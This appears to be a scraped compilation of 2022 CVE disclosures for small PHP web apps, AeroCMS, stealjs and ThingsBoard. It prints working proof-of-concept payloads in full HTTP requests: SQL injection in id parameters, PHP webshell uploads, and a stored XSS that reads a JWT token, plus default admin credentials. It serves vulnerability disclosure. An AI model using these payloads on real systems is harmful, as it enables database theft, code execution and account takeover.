A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js.

CVE-2022-37262: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

Church Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/edit_user.php.

**Church Management System v1.0 by Godfrey De Blessed has SQL injection**

BUG\_Author: XuBoyu

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /cman/admin/edit\_user.php?id=

Vulnerability location: /cman/admin/edit\_user.php?id=, id

dbname = cman

\[+\] Payload: /cman/admin/edit\_user.php?id=-1%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /cman/admin/edit\_user.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38595: bug_report/SQLi-2.md at main · Estbonxby/bug_report

Church Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/edit_visitor.php.

**Church Management System v1.0 by Godfrey De Blessed has SQL injection**

BUG\_Author: XuBoyu

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/11206/church-management-system.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /cman/admin/edit\_visitor.php?id=

Vulnerability location: /cman/admin/edit\_visitor.php?id=, id

dbname = cman

\[+\] Payload: /cman/admin/edit\_visitor.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /cman/admin/edit\_visitor.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38594: bug_report/SQLi-1.md at main · Estbonxby/bug_report

Event Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /Royal_Event/update_image.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Event Management System v1.0 by Nikhil\_B has arbitrary code execution (RCE)**

BUG\_Author: Gsir

vendors: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html

The program is built using the xmapp-php8.1 version

Login account: ndbhalerao91@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/travellers.php

Loophole location: Event Management System's update\_img.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /Royal\_Event/update\_image.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Royal\_Event/update\_image.php?id=2%27
Cookie: PHPSESSID=0pba7l89o53c7tini68b77ci0m
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------16095109891890
Content-Length: 435
\-----------------------------16095109891890
Content-Disposition: form-data; name="productName"
NikhilÂ Bhalerao
\-----------------------------16095109891890
Content-Disposition: form-data; name="productimage1"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------16095109891890
Content-Disposition: form-data; name="submit"
\-----------------------------16095109891890--

The files will be uploaded to this directory \\tour\\admin\\img 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-38323: bug_report/RCE-1.md at main · Gsir97/bug_report

AeroCMS v0.0.1 was discovered to contain an arbitrary file upload vulnerability via the component /admin/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Hello I want to report an arbitrary file upload vulnerability that I found in AeroCms v0.0.1, through which we can upload webshell and control the web server.

**Step to Reproduct**

After entering the background of website management, click "Profile" to enter the interface of "/admin/profile. PHP", and you can see that the function of uploading pictures exists.  

We create a new webshell file and name it shell.php ：

<?php phpinfo(); ?>

Next, we select the file and click "Updae Profile" to upload the file  

When upload success access **'/images/shell.php'**

**We can see that the file was successfully uploaded and executed**

**Vulnerable Code**

**No file checking before uploading**

**POC**

**Injection Point**

> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg

**Request**

> POST /admin/profile.php HTTP/1.1  
> Host: 127.0.0.1:8080  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050  
> Content-Length: 1109  
> Origin: http://127.0.0.1:8080  
> Connection: close  
> Referer: http://127.0.0.1:8080/admin/profile.php  
> Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3  
> Upgrade-Insecure-Requests: 1
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="username"
> 
> 1111  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="password"
> 
> 123.com  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_firstname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_lastname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_email"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg
> 
> test is test
> 
> <?php phpinfo();?>  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_role"
> 
> Subscriber  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="update\_user"
> 
> Update Profile  
> \-----------------------------423983190532431556521178267050--

**response**

> HTTP/1.1 200 OK  
> Date: Wed, 10 Aug 2022 02:45:01 GMT  
> Server: Apache/2.4.10 (Debian)  
> Expires: Thu, 19 Nov 1981 08:52:00 GMT  
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
> Pragma: no-cache  
> Vary: Accept-Encoding  
> Content-Length: 8474  
> Connection: close  
> Content-Type: text/html; charset=UTF-8
> 
>     <meta charset="utf-8">
>     <meta http-equiv="X-UA-Compatible" content="IE=edge">
>     <meta name="viewport" content="width=device-width, initial-scale=1">
>     <meta name="description" content="">
>     <meta name="author" content="">
>     
>     <title>AeroCMS Admin Panel</title>
>     
>     
>     <link href="css/bootstrap.min.css" rel="stylesheet">
>     
>     
>     <link href="css/sb-admin.css" rel="stylesheet">
>     
>     
>     <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
>     
>     
>     
>     
>     
>     <link rel="stylesheet" href="css/styles.css">
>     
>     <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
>     
>     <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script>
>     
>     <script src="js/jquery.js"></script>
>     
> 
>     <div id="wrapper">
>     
>         
>         <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
>             
>             <div class="navbar-header">
>                 <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
>                     <span class="sr-only">Toggle navigation</span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                 </button>
>                 <a class="navbar-brand" href="index.php">AeroCMS</a>
>             </div>
>             
>             <ul class="nav navbar-right top-nav">
>                 
>                 <li><a href='#'>Users Online: <span class="usersonline"></span></a></li>
>                 <li><a href="../index.php">View Site</a></li>
>                 
>                 <li class="dropdown">
>                     <a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i>  <b class="caret"></b></a>
>                     <ul class="dropdown-menu">
>                         <li>
>                             <a href="#"><i class="fa fa-fw fa-user"></i> Profile</a>
>                         </li>
>                         <li class="divider"></li>
>                         <li>
>                             <a href="../includes/logout.php"><i class="fa fa-fw fa-power-off"></i> Log Out</a>
>                         </li>
>                     </ul>
>                 </li>
>             </ul>
>             
>             <div class="collapse navbar-collapse navbar-ex1-collapse">
>                 <ul class="nav navbar-nav side-nav">
>                     <li>
>                         <a href="index.php"><i class="fa fa-fw fa-dashboard"></i> Dashboard</a>
>                     </li>
>                     
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#posts_dropdown"><i class="fa fa-fw fa-arrows-v"></i> Posts <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="posts_dropdown" class="collapse">
>                             <li>
>                                 <a href="./posts.php">View All Posts</a>
>                             </li>
>                             <li>
>                                 <a href="./posts.php?source=add_post">Add Posts</a>
>                             </li>
>                         </ul>
>                     </li>
>     
>                     <li>
>                         <a href="./categories.php"><i class="fa fa-fw fa-wrench"></i> Categories</a>
>                     </li>
>     
>                     <li>
>                         <a href="./comments.php"><i class="fa fa-fw fa-file"></i> Comments</a>
>                     </li>
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#users"><i class="fa fa-fw fa-arrows-v"></i> Users <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="users" class="collapse">
>                             <li>
>                                 <a href="./users.php">View All Users</a>
>                             </li>
>                             <li>
>                                 <a href="./users.php?source=add_user">Add User</a>
>                             </li>
>                         </ul>
>                     </li>
>                     <li>
>                         <a href="./profile.php"><i class="fa fa-fw fa-file"></i> Profile</a>
>                     </li>
>                 </ul>
>             </div>
>             
>         </nav>
>     
>         <div id="page-wrapper">
>     
>             <div class="container-fluid">
>     
>                 
>                 <div class="row">
>                     <div class="col-lg-12">
>                         <h1 class="page-header">
>                             Welcome to the Admin Panel,
>                             <small>!</small>
>                         </h1>
>     
>                         <form action="" method="post" enctype="multipart/form-data">
>     
>                             <div class="form-group">
>                                     <label for="username">Username</label>
>                                     <input type="text" name="username" value="1111" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                     <label for="password">Password</label>
>                                     <input type="password" name="password" value="123.com" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_firstname">Firstname</label>
>                                 <input type="text" name="user_firstname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_lastname">Lastname</label>
>                                 <input type="text" name="user_lastname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_email">Email</label>
>                                 <input type="email" name="user_email" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_image">Image</label>
>                                 <img class="img-responsive" width="200" src="../images/test2.php" alt="">
>                                 <input type="file" name="user_image" class="form-control">
>                             </div>
>     
>     
>                             <div class="form-group">
>                                 <select name="user_role" class="form-control">
>                                     <option value="Subscriber">Subscriber</option>
>                                 
>                                 <option value='Admin'>Admin</option>                                    
>                                     
>                                     
>                                 </select>
>     
>                             </div>
>     
>                             <div class="form-group">
>                                 <input type="submit" value="Update Profile" name="update_user" class="btn btn-primary">
>                             </div>
>     
>                         </form>
>     
>     
>                     </div>
>                 </div>
>                 
>     
>             </div>
>             
>     
>         </div>
>         
>     
>     </div>
>     
>     
> 
> <script src="js/scripts.js"></script>

**I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply**

CVE-2022-38305: An arbitrary file upload vulnerability was found · Issue #3 · MegaTKC/AeroCMS

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs.

Cross site Scripting (XSS) in ThingsBoard IoT Platform through 3.3.4.1 via a crafted value being sent to the audit logs.

Audit logs help in establishing accountability of usage among various users of an application. However, if this functionality is not implemented securely, attackers can abuse the implementation flaws to launch attacks against application users. In this blog, we take a look at an XSS vulnerability in the audit logs feature of Thingsboard, an open-source IoT platform, and how it leads to account takeover of admin accounts. This vulnerability can be exploited by an existing lower privileged user of the platform.

According to Thingsboard's documentation (https://thingsboard.io/docs/pe/user-guide/rbac/), on the community edition, _"a tenant administrator manages devices, dashboards, customers, and other entities that belong to a particular tenant"._ Each tenant has several customers and as per documentation - _"Customer user is able to view dashboards and control devices that are assigned to a specific customer."_  If a customer is able to take over the account of a tenant admin, that customer would be able to target all other customers belonging to the same tenant.

A stored cross-site scripting vulnerability on Thingsboard lets a customer take over the account of a tenant admin. A customer has view-only privilege for most functionalities. However, a customer can edit their own profile, and insert an XSS payload in the "email" parameter.  This XSS payload gets injected in the audit logs page, and when a tenant admin views the audit logs, the customer gets the tenant admin's authentication token (stored in LocalStorage).

Below is the underlying HTTP POST request in which the customer inserts an XSS payload in the email parameter, followed by the HTTP response (providing the complete request/response without masking any sensitive field, as the information corresponds to default accounts on a local installation of Thingsboard community edition).

**HTTP Request:**

POST /api/user?sendActivationMail=false HTTP/1.1

Host: localhost:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0

Accept: application/json, text/plain, \*/\*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json

X-Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJjdXN0b21lckB0aGluZ3Nib2FyZC5vcmciLCJ1c2VySWQiOiJkN2VkYjliMC0zMWViLTExZWQtYmVhOS00M2MzY2JjODFhNjMiLCJzY29wZXMiOlsiQ1VTVE9NRVJfVVNFUiJdLCJpc3MiOiJ0aGluZ3Nib2FyZC5pbyIsImlhdCI6MTY2MzA5NTI4OCwiZXhwIjoxNjYzMTA0Mjg4LCJmaXJzdE5hbWUiOiJ0ZXN0MDFzIiwibGFzdE5hbWUiOiJoa2Jja2EiLCJlbmFibGVkIjp0cnVlLCJpc1B1YmxpYyI6ZmFsc2UsInRlbmFudElkIjoiZDc0ZWUxYTAtMzFlYi0xMWVkLWJlYTktNDNjM2NiYzgxYTYzIiwiY3VzdG9tZXJJZCI6ImQ3ZGZkNzAwLTMxZWItMTFlZC1iZWE5LTQzYzNjYmM4MWE2MyJ9.Gg-KmkQn7Bv2-in8CLEVt8VKtTHTDxUpOfbzIouaND5gYP74JnUC5tOwPR-Ebm4xpeVzG9ooYOS3KIYRFuKBsg

Content-Length: 758

Origin: http://localhost:8080

Connection: close

Referer: http://localhost:8080/profile

{"id":{"entityType":"USER","id":"d7edb9b0-31eb-11ed-bea9-43c3cbc81a63"},"createdTime":1662912452811,"additionalInfo":{"userPasswordHistory":{"1662912452941":"$2a$10$raEXkVa09GJaH3UnbFIKMeyQTypYThWhwpe0pHEMuZ3ZX80VIrcWu"},"failedLoginAttempts":0,"lastLoginTs":1663095288216,"userCredentialsEnabled":true,"lang":"en\_US","homeDashboardHideToolbar":true},"tenantId":{"entityType":"TENANT","id":"d74ee1a0-31eb-11ed-bea9-43c3cbc81a63"},"customerId":{"entityType":"CUSTOMER","id":"d7dfd700-31eb-11ed-bea9-43c3cbc81a63"},**"email":"customer@thingsboard.org<img src=# onerror=alert(localStorage.getItem('jwt\_token'))>"**,"authority":"CUSTOMER\_USER","firstName":"test","lastName":"test","name":"customer@thingsboard.org","language":"en\_US","homeDashboardHideToolbar":true}

**HTTP Response:**

HTTP/1.1 400 

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

Cache-Control: no-cache, no-store, max-age=0, must-revalidate

Pragma: no-cache

Expires: 0

Content-Type: application/json;charset=ISO-8859-1

Content-Length: 202

Date: Tue, 13 Sep 2022 18:56:57 GMT

Connection: close

{"status":400,"message":"Invalid email address format 'customer@thingsboard.org<img src=# onerror=alert(localStorage.getItem('jwt\_token'))>'!","errorCode":31,"timestamp":"2022-09-13T18:56:57.476+00:00"}

We can confirm that the user who issued this request is indeed a customer by decoding the JWT token used in the request:

**JWT:**

eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJjdXN0b21lckB0aGluZ3Nib2FyZC5vcmciLCJ1c2VySWQiOiJkN2VkYjliMC0zMWViLTExZWQtYmVhOS00M2MzY2JjODFhNjMiLCJzY29wZXMiOlsiQ1VTVE9NRVJfVVNFUiJdLCJpc3MiOiJ0aGluZ3Nib2FyZC5pbyIsImlhdCI6MTY2MzA5NTI4OCwiZXhwIjoxNjYzMTA0Mjg4LCJmaXJzdE5hbWUiOiJ0ZXN0MDFzIiwibGFzdE5hbWUiOiJoa2Jja2EiLCJlbmFibGVkIjp0cnVlLCJpc1B1YmxpYyI6ZmFsc2UsInRlbmFudElkIjoiZDc0ZWUxYTAtMzFlYi0xMWVkLWJlYTktNDNjM2NiYzgxYTYzIiwiY3VzdG9tZXJJZCI6ImQ3ZGZkNzAwLTMxZWItMTFlZC1iZWE5LTQzYzNjYmM4MWE2MyJ9.Gg-KmkQn7Bv2-in8CLEVt8VKtTHTDxUpOfbzIouaND5gYP74JnUC5tOwPR-Ebm4xpeVzG9ooYOS3KIYRFuKBsg

**Decoded JWT payload** (from jwt.io):

{

  "sub": "customer@thingsboard.org",

  "userId": "d7edb9b0-31eb-11ed-bea9-43c3cbc81a63",

  "scopes": \[

    "CUSTOMER\_USER"

  \],

  "iss": "thingsboard.io",

  "iat": 1663095288,

  "exp": 1663104288,

  "firstName": "test01s",

  "lastName": "hkbcka",

  "enabled": true,

  "isPublic": false,

  "tenantId": "d74ee1a0-31eb-11ed-bea9-43c3cbc81a63",

  "customerId": "d7dfd700-31eb-11ed-bea9-43c3cbc81a63"

}

When a tenant admin views the audit logs, the payload injected by the customer (i.e., **<img src=# onerror=alert(localStorage.getItem('jwt\_token'))>** executes on the browser of the tenant admin, as shown below.

**References:**

CVE-2022-31861: CVE-ID: CVE-2022-31861

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /maintenance/manage_department.php.

Permalink

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhang Huaiyu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/maintenance/manage\_department.php?id

Vulnerability location: /leave\_system/admin/maintenance/manage\_department.php?id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/maintenance/manage\_department.php?id=1%27%20and%20length(database())%20=9--+ // Leak place ---> id

GET /leave\_system/admin/maintenance/manage\_department.php?id\=1%27%20and%20length(database())%20\=9\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-38302: bug_report/SQLi-1.md at main · GGMMNN/bug_report

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /maintenance/manage_leave_type.php.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhang Huaiyu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/maintenance/manage\_leave\_type.php?id

Vulnerability location: /leave\_system/admin/maintenance/manage\_leave\_type.php?id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/maintenance/manage\_leave\_type.php?id=3%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /leave\_system/admin/maintenance/manage\_leave\_type.php?id\=3%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-38304: bug_report/SQLi-3.md at main · GGMMNN/bug_report

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /employees/manage_leave_type.php.

Permalink

Cannot retrieve contributors at this time

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Zhang Huaiyu

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /leave\_system/admin/employees/manage\_leave\_type.php?id

Vulnerability location: /leave\_system/admin/employees/manage\_leave\_type.php?id=,id

dbname=leave\_db,length=8

\[+\] Payload: /leave\_system/admin/employees/manage\_leave\_type.php?id=11%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /leave\_system/admin/employees/manage\_leave\_type.php?id\=11%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

length=8 

length=9

CVE-2022-38303: bug_report/SQLi-2.md at main · GGMMNN/bug_report

Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editclient.php.

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author:Broccoli

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editclient.php?id=

Vulnerability location: /garage/editclient.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editclient.php?id=-1%27+union+select+1,database(),3,4,5,6,7,8--+ // Leak place ---> id

GET /garage/editclient.php?id\=\-1%27+union+select+1,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

Tag

#firefox